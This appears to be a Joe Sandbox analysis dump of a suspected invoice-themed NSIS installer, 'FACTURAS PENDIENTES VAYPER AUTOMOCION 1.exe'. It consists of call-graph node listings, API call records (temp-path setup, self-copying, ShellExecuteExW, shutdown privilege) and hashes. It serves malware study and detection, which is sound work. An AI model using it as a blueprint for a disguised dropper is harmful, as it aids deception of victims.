402b67 5240->5239 5241 402077 5242 40303e 17 API calls 5241->5242 5243 40207d 5242->5243 5244 40303e 17 API calls 5243->5244 5245 402086 5244->5245 5246 40303e 17 API calls 5245->5246 5247 40208f 5246->5247 5248 40303e 17 API calls 5247->5248 5249 402098 5248->5249 5250 405d15 24 API calls 5249->5250 5251 4020a4 5250->5251 5258 4069ce ShellExecuteExW 5251->5258 5253 4020ea 5255 401709 5253->5255 5259 4064ef WaitForSingleObject 5253->5259 5256 402109 CloseHandle 5256->5255 5258->5253 5260 406506 5259->5260 5261 40651c GetExitCodeProcess 5260->5261 5262 4061ea 2 API calls 5260->5262 5261->5256 5263 40650d WaitForSingleObject 5262->5263 5263->5260 5264 4043f9 GetDlgItem GetDlgItem 5265 40444d 7 API calls 5264->5265 5272 404673 5264->5272 5266 4044f0 DeleteObject 5265->5266 5267 4044e3 SendMessageW 5265->5267 5269 4044ff 5266->5269 5267->5266 5268 4047aa 5270 404884 5268->5270 5271 4047ef 5268->5271 5273 40453d 5269->5273 5277 405e95 17 API calls 5269->5277 5275 404893 SendMessageW 5270->5275 5276 4048af 5270->5276 5274 4048d9 5271->5274 5281 40480e SendMessageW 5271->5281 5272->5268 5296 404705 5272->5296 5318 4056b5 SendMessageW 5272->5318 5280 4054f5 18 API calls 5273->5280 5283 405736 8 API calls 5274->5283 5275->5274 5284 4048b9 5276->5284 5294 4048ef 5276->5294 5279 404515 SendMessageW SendMessageW 5277->5279 5279->5269 5285 404555 5280->5285 5281->5274 5287 40482b SendMessageW 5281->5287 5282 404792 SendMessageW 5282->5268 5288 404b01 5283->5288 5289 4048c2 ImageList_Destroy 5284->5289 5290 4048c9 5284->5290 5292 4054f5 18 API calls 5285->5292 5286 404ab8 5286->5274 5295 404acf ShowWindow GetDlgItem ShowWindow 5286->5295 5293 404844 5287->5293 5289->5290 5290->5274 5291 4048d2 GlobalFree 5290->5291 5291->5274 5304 404561 5292->5304 5299 40485a SendMessageW 5293->5299 5294->5286 5312 404926 5294->5312 5323 405491 5294->5323 5295->5274 5296->5268 5296->5282 5297 404640 GetWindowLongW SetWindowLongW 5298 404656 5297->5298 5300 40466d 5298->5300 5301 40465d 
ShowWindow 5298->5301 5299->5294 5317 4054de SendMessageW 5300->5317 5301->5300 5303 4045b9 SendMessageW 5303->5304 5304->5297 5304->5303 5305 40463c 5304->5305 5307 4045f5 SendMessageW 5304->5307 5308 404608 SendMessageW 5304->5308 5305->5297 5305->5298 5307->5304 5308->5304 5309 404a6e 5310 404a8a InvalidateRect 5309->5310 5314 404a99 5309->5314 5310->5314 5311 404964 SendMessageW 5313 40497e 5311->5313 5312->5311 5312->5313 5313->5309 5316 404a14 SendMessageW SendMessageW 5313->5316 5314->5286 5315 40553b 20 API calls 5314->5315 5315->5286 5316->5313 5317->5272 5319 405714 SendMessageW 5318->5319 5320 4056d6 GetMessagePos ScreenToClient SendMessageW 5318->5320 5322 40570c 5319->5322 5321 405711 5320->5321 5320->5322 5321->5319 5322->5296 5332 406af5 lstrcpynW 5323->5332 5325 4054a4 5333 4065fa wsprintfW 5325->5333 5327 4054ae 5328 401533 94 API calls 5327->5328 5329 4054b7 5328->5329 5334 406af5 lstrcpynW 5329->5334 5331 4054be 5331->5312 5332->5325 5333->5327 5334->5331 5335 402e7c SendMessageW 5336 402ea1 5335->5336 5337 402e94 InvalidateRect 5335->5337 5337->5336 4898 4025ff 4899 402608 4898->4899 4900 40262f 4898->4900 4901 4030c1 17 API calls 4899->4901 4902 40303e 17 API calls 4900->4902 4903 40260f 4901->4903 4904 402636 4902->4904 4905 402615 4903->4905 4908 402648 4903->4908 4910 40307c 4904->4910 4907 40303e 17 API calls 4905->4907 4909 40261c RegDeleteValueW RegCloseKey 4907->4909 4909->4908 4911 403089 4910->4911 4912 403090 4910->4912 4911->4908 4912->4911 4914 40141e 4912->4914 4915 4062b3 RegOpenKeyExW 4914->4915 4916 40145b 4915->4916 4917 401463 4916->4917 4918 401527 4916->4918 4919 40146f RegEnumValueW 4917->4919 4924 401493 4917->4924 4918->4911 4920 401503 RegCloseKey 4919->4920 4919->4924 4920->4918 4921 4014ce RegEnumKeyW 4922 4014d8 RegCloseKey 4921->4922 4921->4924 4923 4068c1 5 API calls 4922->4923 4925 4014e9 4923->4925 4924->4920 4924->4921 4924->4922 4926 40141e 6 API calls 4924->4926 4927 401514 4925->4927 4928 4014ed RegDeleteKeyW 
4925->4928 4926->4924 4927->4918 4928->4918 5338 401000 5339 401039 BeginPaint GetClientRect 5338->5339 5340 40100a DefWindowProcW 5338->5340 5341 40110f 5339->5341 5343 40119a 5340->5343 5344 401117 5341->5344 5345 40107e CreateBrushIndirect FillRect DeleteObject 5341->5345 5346 401185 EndPaint 5344->5346 5347 40111d CreateFontIndirectW 5344->5347 5345->5341 5346->5343 5347->5346 5348 401130 6 API calls 5347->5348 5348->5346 3813 401d01 3816 401d0f 3813->3816 3823 401d5d 3813->3823 3814 401d50 3818 405e95 17 API calls 3814->3818 3815 401d8c GlobalAlloc 3830 405e95 3815->3830 3816->3814 3821 401d1e 3816->3821 3818->3823 3819 401d67 3822 401709 3819->3822 3850 406af5 lstrcpynW 3819->3850 3847 406af5 lstrcpynW 3821->3847 3823->3815 3823->3819 3824 401d79 GlobalFree 3824->3822 3826 401d2d 3848 406af5 lstrcpynW 3826->3848 3828 401d3c 3849 406af5 lstrcpynW 3828->3849 3843 405ea0 3830->3843 3831 4060d9 3832 4060ee 3831->3832 3858 406af5 lstrcpynW 3831->3858 3832->3822 3835 4060a4 lstrlenW 3835->3843 3836 405fb9 GetSystemDirectoryW 3836->3843 3838 405e95 10 API calls 3838->3835 3839 405fcc GetWindowsDirectoryW 3839->3843 3841 405ff9 SHGetSpecialFolderLocation 3842 406011 SHGetPathFromIDListW CoTaskMemFree 3841->3842 3841->3843 3842->3843 3843->3831 3843->3835 3843->3836 3843->3838 3843->3839 3843->3841 3844 405e95 10 API calls 3843->3844 3845 406d18 CharNextW CharNextW CharNextW CharNextW CharPrevW 3843->3845 3846 406045 lstrcatW 3843->3846 3851 406952 3843->3851 3856 4065fa wsprintfW 3843->3856 3857 406af5 lstrcpynW 3843->3857 3844->3843 3845->3843 3846->3843 3847->3826 3848->3828 3849->3822 3850->3824 3859 4062b3 3851->3859 3854 406987 RegQueryValueExW RegCloseKey 3855 4069b8 3854->3855 3855->3843 3856->3843 3857->3843 3858->3832 3860 4062c2 3859->3860 3861 4062c6 3860->3861 3862 4062cb RegOpenKeyExW 3860->3862 3861->3854 3861->3855 3862->3861 5349 401b03 5350 403002 17 API calls 5349->5350 5351 401b0a 5350->5351 5352 403002 17 API calls 5351->5352 5353 401b15 
5352->5353 5354 40303e 17 API calls 5353->5354 5355 401b20 lstrlenW 5354->5355 5356 401b3c 5355->5356 5357 401b67 5355->5357 5356->5357 5361 406af5 lstrcpynW 5356->5361 5359 401b5b 5359->5357 5360 401b5f lstrlenW 5359->5360 5360->5357 5361->5359 5362 401c04 5363 403002 17 API calls 5362->5363 5364 401c0e 5363->5364 5365 403002 17 API calls 5364->5365 5366 401bb2 5365->5366 5367 401b88 5368 40303e 17 API calls 5367->5368 5369 401b8f 5368->5369 5370 40303e 17 API calls 5369->5370 5371 401b98 5370->5371 5372 401ba0 lstrcmpiW 5371->5372 5373 401ba8 lstrcmpW 5371->5373 5374 401bae 5372->5374 5373->5374 3909 404b0b 3910 404cb4 3909->3910 3911 404b28 GetDlgItem GetDlgItem GetDlgItem 3909->3911 3913 404d00 3910->3913 3914 404cbc GetDlgItem CreateThread CloseHandle 3910->3914 3955 4054de SendMessageW 3911->3955 3915 404d31 3913->3915 3916 404d08 3913->3916 3918 404ce8 3914->3918 3989 40583f OleInitialize 3914->3989 3920 404d39 3915->3920 3921 404d7f 3915->3921 3916->3918 3919 404d14 ShowWindow ShowWindow 3916->3919 3917 404ba1 3925 404ba8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3917->3925 3960 405736 3918->3960 3974 4054de SendMessageW 3919->3974 3924 404d55 ShowWindow 3920->3924 3928 404d42 3920->3928 3921->3918 3926 404d92 SendMessageW 3921->3926 3924->3928 3929 404d6c 3924->3929 3930 404bf8 SendMessageW SendMessageW 3925->3930 3931 404c0c 3925->3931 3932 404cf6 3926->3932 3933 404db0 CreatePopupMenu 3926->3933 3927 404d2f 3927->3918 3975 405933 3928->3975 3978 405d15 3929->3978 3930->3931 3936 404c14 SendMessageW 3931->3936 3937 404c1e 3931->3937 3939 405e95 17 API calls 3933->3939 3936->3937 3956 4054f5 3937->3956 3941 404dc2 AppendMenuW 3939->3941 3940 404c30 3942 404c39 ShowWindow 3940->3942 3943 404c6b GetDlgItem SendMessageW 3940->3943 3944 404de4 GetWindowRect 3941->3944 3945 404df8 TrackPopupMenu 3941->3945 3946 404c5a 3942->3946 3947 404c4f ShowWindow 3942->3947 3943->3932 3949 404c97 SendMessageW SendMessageW 3943->3949 3944->3945 3945->3932 
3948 404e1a 3945->3948 3959 4054de SendMessageW 3946->3959 3947->3946 3950 404e2e SendMessageW 3948->3950 3949->3932 3950->3950 3952 404e4a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3950->3952 3953 404e76 SendMessageW 3952->3953 3953->3953 3954 404ea4 GlobalUnlock SetClipboardData CloseClipboard 3953->3954 3954->3932 3955->3917 3957 405e95 17 API calls 3956->3957 3958 405500 SetDlgItemTextW 3957->3958 3958->3940 3959->3943 3961 40574e GetWindowLongW 3960->3961 3962 405804 3960->3962 3961->3962 3963 405763 3961->3963 3962->3932 3963->3962 3964 405797 3963->3964 3965 40578b GetSysColor 3963->3965 3966 4057a5 SetBkMode 3964->3966 3967 40579b SetTextColor 3964->3967 3965->3964 3968 4057cd 3966->3968 3969 4057be GetSysColor 3966->3969 3967->3966 3970 4057d1 SetBkColor 3968->3970 3971 4057de 3968->3971 3969->3968 3970->3971 3971->3962 3972 4057f7 CreateBrushIndirect 3971->3972 3973 4057ee DeleteObject 3971->3973 3972->3962 3973->3972 3974->3927 3976 405940 SendMessageW 3975->3976 3977 40593a 3975->3977 3976->3927 3977->3976 3979 405d27 3978->3979 3984 405ddd 3978->3984 3980 405d46 lstrlenW 3979->3980 3981 405e95 17 API calls 3979->3981 3982 405d58 lstrlenW 3980->3982 3985 405d7b 3980->3985 3981->3980 3983 405d6d lstrcatW 3982->3983 3982->3984 3983->3985 3984->3928 3986 405d92 3985->3986 3987 405d85 SetWindowTextW 3985->3987 3986->3984 3988 405d97 SendMessageW SendMessageW SendMessageW 3986->3988 3987->3986 3988->3984 3996 4054c3 3989->3996 3991 405862 3995 405889 3991->3995 3999 401399 3991->3999 3992 4054c3 SendMessageW 3993 40589b OleUninitialize 3992->3993 3995->3992 3997 4054db 3996->3997 3998 4054cc SendMessageW 3996->3998 3997->3991 3998->3997 4000 4013a3 3999->4000 4002 401413 3999->4002 4000->4002 4003 4013df MulDiv SendMessageW 4000->4003 4004 40154a 4000->4004 4002->3991 4003->4000 4005 4015c3 4004->4005 4113 4015ce 4004->4113 4006 4016c1 4005->4006 4007 4017c2 4005->4007 4008 4015e6 4005->4008 4009 4018cb 4005->4009 4010 40160c 4005->4010 4011 4016ef 
4005->4011 4012 4016af 4005->4012 4013 40182f 4005->4013 4014 401711 4005->4014 4015 401633 SetForegroundWindow 4005->4015 4016 4017d3 4005->4016 4017 401618 4005->4017 4018 4015f9 4005->4018 4019 40189b 4005->4019 4020 4018de 4005->4020 4021 40163f 4005->4021 4005->4113 4114 4015d5 4005->4114 4032 4016d1 ShowWindow 4006->4032 4033 4016d9 4006->4033 4023 40303e 17 API calls 4007->4023 4022 4015f0 PostQuitMessage 4008->4022 4008->4113 4027 40303e 17 API calls 4009->4027 4041 405d15 24 API calls 4010->4041 4034 40303e 17 API calls 4011->4034 4156 4065fa wsprintfW 4012->4156 4030 40303e 17 API calls 4013->4030 4024 40303e 17 API calls 4014->4024 4015->4113 4026 40303e 17 API calls 4016->4026 4028 403002 17 API calls 4017->4028 4049 401399 77 API calls 4018->4049 4025 40303e 17 API calls 4019->4025 4029 40303e 17 API calls 4020->4029 4052 403002 17 API calls 4021->4052 4021->4113 4022->4113 4036 4017c8 4023->4036 4037 401718 4024->4037 4038 4018a2 SearchPathW 4025->4038 4039 4017da 4026->4039 4040 4018d2 4027->4040 4042 40161e Sleep 4028->4042 4043 4018e5 4029->4043 4044 401835 GetFullPathNameW 4030->4044 4032->4033 4045 4016e6 ShowWindow 4033->4045 4033->4113 4035 4016f6 SetFileAttributesW 4034->4035 4035->4113 4160 4065aa FindFirstFileW 4036->4160 4115 406ba0 CharNextW CharNextW 4037->4115 4038->4113 4050 40303e 17 API calls 4039->4050 4130 406a31 4040->4130 4041->4113 4042->4113 4059 401906 4043->4059 4060 40190e 4043->4060 4053 401857 4044->4053 4054 40184d 4044->4054 4045->4113 4046 405d15 24 API calls 4046->4113 4049->4113 4055 4017e3 4050->4055 4052->4113 4053->4054 4066 4065aa 2 API calls 4053->4066 4056 401889 GetShortPathNameW 4054->4056 4054->4113 4058 40303e 17 API calls 4055->4058 4056->4113 4057 401780 4057->4010 4065 401790 4057->4065 4062 4017ec MoveFileW 4058->4062 4168 406af5 lstrcpynW 4059->4168 4169 406af5 lstrcpynW 4060->4169 4061 4065d1 CharNextW 4082 401720 4061->4082 4062->4010 4067 401804 4062->4067 4070 405d15 24 API calls 4065->4070 4071 
40186a 4066->4071 4074 4065aa 2 API calls 4067->4074 4067->4113 4068 40190c 4077 406d18 5 API calls 4068->4077 4069 401919 4170 406531 lstrlenW CharPrevW 4069->4170 4073 401797 4070->4073 4071->4054 4167 406af5 lstrcpynW 4071->4167 4129 406af5 lstrcpynW 4073->4129 4081 401814 4074->4081 4108 40192b 4077->4108 4081->4113 4163 406218 MoveFileExW 4081->4163 4082->4057 4082->4061 4085 401769 GetFileAttributesW 4082->4085 4121 4064d7 4082->4121 4124 405e19 CreateDirectoryW 4082->4124 4157 405df9 CreateDirectoryW 4082->4157 4083 4017a2 SetCurrentDirectoryW 4083->4113 4085->4082 4086 401968 4173 406b78 GetFileAttributesW 4086->4173 4088 4065aa 2 API calls 4088->4108 4091 40193f CompareFileTime 4091->4108 4092 401a18 4094 405d15 24 API calls 4092->4094 4093 4019fd 4096 405d15 24 API calls 4093->4096 4097 401a24 4094->4097 4095 406af5 lstrcpynW 4095->4108 4096->4113 4135 403148 4097->4135 4100 401a52 SetFileTime 4101 401a60 CloseHandle 4100->4101 4103 401a73 4101->4103 4101->4113 4102 405e95 17 API calls 4102->4108 4104 401a78 4103->4104 4105 401a89 4103->4105 4106 405e95 17 API calls 4104->4106 4107 405e95 17 API calls 4105->4107 4109 401a80 lstrcatW 4106->4109 4110 401a91 4107->4110 4108->4086 4108->4088 4108->4091 4108->4092 4108->4093 4108->4095 4108->4102 4108->4114 4134 4068f6 GetFileAttributesW CreateFileW 4108->4134 4176 406a83 4108->4176 4109->4110 4112 406a83 MessageBoxIndirectW 4110->4112 4112->4113 4113->4000 4114->4046 4114->4113 4116 406bbe 4115->4116 4120 406bf5 4115->4120 4117 406bcd CharNextW 4116->4117 4119 406bd2 4116->4119 4117->4120 4118 4065d1 CharNextW 4118->4119 4119->4118 4119->4120 4120->4082 4180 4068c1 GetModuleHandleA 4121->4180 4125 405e64 GetLastError 4124->4125 4126 405e87 4124->4126 4125->4126 4127 405e71 SetFileSecurityW 4125->4127 4126->4082 4127->4126 4128 405e8b GetLastError 4127->4128 4128->4126 4129->4083 4131 406a3e GetTickCount GetTempFileNameW 4130->4131 4132 406a72 4131->4132 4133 406a76 4131->4133 4132->4131 4132->4133 4133->4113 
4134->4108 4136 403190 4135->4136 4137 403183 4135->4137 4189 406923 ReadFile 4136->4189 4204 403131 SetFilePointer 4137->4204 4141 401a3a 4141->4100 4141->4101 4142 4032f6 4144 40333d 4142->4144 4149 4032fa 4142->4149 4143 4031b6 GetTickCount 4148 4031ca 4143->4148 4145 40311b ReadFile 4144->4145 4145->4141 4146 40311b ReadFile 4146->4149 4148->4141 4152 40323a GetTickCount 4148->4152 4153 40326b MulDiv wsprintfW 4148->4153 4191 40311b 4148->4191 4194 406e83 4148->4194 4202 4069e6 WriteFile 4148->4202 4149->4141 4149->4146 4150 4069e6 WriteFile 4149->4150 4150->4149 4152->4148 4154 405d15 24 API calls 4153->4154 4154->4148 4156->4113 4158 405e13 4157->4158 4159 405e0b GetLastError 4157->4159 4158->4082 4159->4158 4161 4065c0 FindClose 4160->4161 4162 4065cb 4160->4162 4161->4162 4162->4113 4164 406239 4163->4164 4165 40622c 4163->4165 4164->4010 4205 4062e1 4165->4205 4167->4054 4168->4068 4169->4069 4171 40191f lstrcatW 4170->4171 4172 40654e lstrcatW 4170->4172 4171->4068 4172->4171 4174 406b9a 4173->4174 4175 406b8a SetFileAttributesW 4173->4175 4174->4108 4175->4174 4177 406a98 4176->4177 4178 406ae6 4177->4178 4179 406aae MessageBoxIndirectW 4177->4179 4178->4108 4179->4178 4181 4068e3 GetProcAddress 4180->4181 4182 4068d9 4180->4182 4183 4064de 4181->4183 4186 406179 GetSystemDirectoryW 4182->4186 4183->4082 4185 4068df 4185->4181 4185->4183 4187 40619b wsprintfW LoadLibraryExW 4186->4187 4187->4185 4190 4031a2 4189->4190 4190->4141 4190->4142 4190->4143 4192 406923 ReadFile 4191->4192 4193 40312e 4192->4193 4193->4148 4195 406eae 4194->4195 4199 406ea6 4194->4199 4196 406fe9 4195->4196 4197 406fc5 GlobalFree 4195->4197 4198 406fcf GlobalAlloc 4195->4198 4195->4199 4196->4196 4196->4199 4200 407055 GlobalFree 4196->4200 4201 40705c GlobalAlloc 4196->4201 4197->4198 4198->4196 4198->4199 4199->4148 4200->4201 4201->4199 4203 406a07 4202->4203 4203->4148 4204->4136 4206 406311 4205->4206 4207 406337 GetShortPathNameW 4205->4207 4232 4068f6 GetFileAttributesW 
CreateFileW 4206->4232 4209 406417 4207->4209 4210 40634c 4207->4210 4209->4164 4210->4209 4211 406354 wsprintfA 4210->4211 4213 405e95 17 API calls 4211->4213 4212 40631b CloseHandle GetShortPathNameW 4212->4209 4214 40632f 4212->4214 4215 40637d 4213->4215 4214->4207 4214->4209 4233 4068f6 GetFileAttributesW CreateFileW 4215->4233 4217 40638a 4217->4209 4218 406395 GetFileSize GlobalAlloc 4217->4218 4219 406410 CloseHandle 4218->4219 4220 4063b4 4218->4220 4219->4209 4221 406923 ReadFile 4220->4221 4222 4063bc 4221->4222 4222->4219 4234 406b11 lstrlenA lstrlenA 4222->4234 4225 40641c 4227 406b11 3 API calls 4225->4227 4226 4063cf lstrcpyA 4229 4063e1 4226->4229 4227->4229 4228 4063f2 SetFilePointer 4230 4069e6 WriteFile 4228->4230 4229->4228 4231 406409 GlobalFree 4230->4231 4231->4219 4232->4212 4233->4217 4235 4063cb 4234->4235 4236 406b30 4234->4236 4235->4225 4235->4226 4236->4235 4237 406b5d lstrlenA 4236->4237 4237->4235 4237->4236 5375 401e8e 5376 403002 17 API calls 5375->5376 5377 401e94 IsWindow 5376->5377 5378 401bb2 5377->5378 5379 404f0e 5380 404f32 5379->5380 5381 404f1a 5379->5381 5382 404f66 5380->5382 5383 404f38 SHGetPathFromIDListW 5380->5383 5389 406a15 GetDlgItemTextW 5381->5389 5385 404f48 5383->5385 5386 404f27 SendMessageW 5383->5386 5388 401533 94 API calls 5385->5388 5386->5382 5388->5386 5389->5386 5390 6fa42c6a 5391 6fa42cc3 5390->5391 5392 6fa42ccd GetLastError 5391->5392 5393 6fa42cd8 5391->5393 5392->5393 5394 40211b 5395 40303e 17 API calls 5394->5395 5396 402121 5395->5396 5397 405d15 24 API calls 5396->5397 5398 40212b 5397->5398 5399 4066b1 2 API calls 5398->5399 5400 402131 5399->5400 5401 40215b 5400->5401 5403 4064ef 5 API calls 5400->5403 5404 401709 5400->5404 5402 402110 CloseHandle 5401->5402 5401->5404 5402->5404 5405 40214b 5403->5405 5405->5401 5407 4065fa wsprintfW 5405->5407 5407->5401 4714 40291d 4715 403002 17 API calls 4714->4715 4725 40292e 4715->4725 4716 402aee 4717 402aa2 SetFilePointer 4719 402980 ReadFile 

                                Control-flow Graph

                                [Graph not reproduced: control-flow graph beginning at block 4036d7-403720; legend: Executed / Not Executed]
                                APIs
                                • SetErrorMode.KERNELBASE(00008001), ref: 004036F3
                                • GetVersionExW.KERNEL32 ref: 0040371C
                                • GetVersionExW.KERNEL32(?), ref: 0040372F
                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004037D7
                                • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403811
                                • OleInitialize.OLE32(00000000), ref: 00403818
                                • SHGetFileInfoW.SHELL32(004085B0,00000000,?,000002B4,00000000), ref: 00403837
                                • GetCommandLineW.KERNEL32(Tolkningen Setup,NSIS Error), ref: 0040384C
                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe",?,"C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe",00000000), ref: 00403898
                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403996
                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004039A7
                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039B3
                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039C7
                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004039CF
                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004039E0
                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004039E8
                                • DeleteFileW.KERNELBASE(1033), ref: 00403A02
                                  • Part of subcall function 004033C8: GetTickCount.KERNEL32 ref: 004033DB
                                  • Part of subcall function 004033C8: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe,00000400,?,?,?,?,?), ref: 004033F7
                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe",00000000,00000000), ref: 00403AA5
                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00408600,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe",00000000,00000000), ref: 00403AB8
                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe",00000000,00000000), ref: 00403AC7
                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe",00000000,00000000), ref: 00403AD6
                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AFE
                                • DeleteFileW.KERNEL32(004209C0,004209C0,?,0042A000,?), ref: 00403B51
                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe,004209C0,?), ref: 00403B63
                                • CloseHandle.KERNEL32(00000000,004209C0,004209C0,?,004209C0,00000000), ref: 00403B9C
                                  • Part of subcall function 00405DF9: CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CA4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00405E01
                                  • Part of subcall function 00405DF9: GetLastError.KERNEL32 ref: 00405E0B
                                • OleUninitialize.OLE32(00000000), ref: 00403BCA
                                • ExitProcess.KERNEL32 ref: 00403BE1
                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403BF7
                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403BFE
                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403C13
                                • AdjustTokenPrivileges.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000), ref: 00403C36
                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C5B
                                  • Part of subcall function 004065D1: CharNextW.USER32(?,00403897,"C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe",?,"C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe",00000000), ref: 004065E7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: Filelstrcat$DirectoryProcess$CharCurrentDeleteEnvironmentErrorExitNextPathTempTokenVariableVersionWindows$AdjustCloseCommandCopyCountCreateHandleInfoInitializeLastLineLookupModeModuleNameOpenPrivilegePrivilegesTickUninitializeValuelstrcmpilstrlen
                                • String ID: "C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\fanin$C:\Users\user\AppData\Local\Temp\fanin\Leflet$C:\Users\user\Desktop$C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$Tolkningen Setup$UXTHEME$\Temp$~nsu
                                • API String ID: 1152188737-768733493
                                • Opcode ID: 8cd5672f1bbfe50c95fd09064464ed4eca0056383847438df08223233b51ff5d
                                • Instruction ID: 07a9971b8f29bbd68b878d9119023e68a6b74827d1d77f0d98df9434206269f1
                                • Opcode Fuzzy Hash: 8cd5672f1bbfe50c95fd09064464ed4eca0056383847438df08223233b51ff5d
                                • Instruction Fuzzy Hash: 4FD137712043116AD7207F619D46B6B3AACAB4574AF51443FF582B62D2DBBC8E408B2E

                                Control-flow Graph

                                [Graph not reproduced: control-flow graph beginning at block 404b0b-404b22; legend: Executed / Not Executed]
                                APIs
                                • GetDlgItem.USER32(?,00000403), ref: 00404B6C
                                • GetDlgItem.USER32(?,000003EE), ref: 00404B7C
                                • GetClientRect.USER32(00000000,?), ref: 00404BB9
                                • GetSystemMetrics.USER32(00000002), ref: 00404BC1
                                • SendMessageW.USER32(00000000,00001061,00000000,00000002), ref: 00404BE3
                                • SendMessageW.USER32(00000000,00001036,00004000,00004000), ref: 00404BF2
                                • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00404C00
                                • SendMessageW.USER32(00000000,00001026,00000000,?), ref: 00404C0A
                                  • Part of subcall function 00405E95: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,00010432,?,?,?,00000000,?,?), ref: 0040604B
                                • SendMessageW.USER32(00000000,00001024,00000000,?), ref: 00404C1C
                                • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00404C40
                                • ShowWindow.USER32(00000000,00000008), ref: 00404C52
                                • GetDlgItem.USER32(?,000003EC), ref: 00404C74
                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00404C88
                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00404CA3
                                • SendMessageW.USER32(00000000,00002001,00000000,?), ref: 00404CAD
                                • ShowWindow.USER32(00000000), ref: 00404D22
                                • ShowWindow.USER32(00010432,00000008), ref: 00404D27
                                • GetDlgItem.USER32(?,000003F8), ref: 00404B8C
                                  • Part of subcall function 004054DE: SendMessageW.USER32(00000028,?,?,00405313), ref: 004054EC
                                • GetDlgItem.USER32(?,000003EC), ref: 00404CCD
                                • CreateThread.KERNEL32(00000000,00000000,Function_0000583F,00000000), ref: 00404CDB
                                • CloseHandle.KERNELBASE(00000000), ref: 00404CE2
                                • ShowWindow.USER32(00000008), ref: 00404D5D
                                • SendMessageW.USER32(00010432,00001004,00000000,00000000), ref: 00404D9C
                                • CreatePopupMenu.USER32 ref: 00404DB0
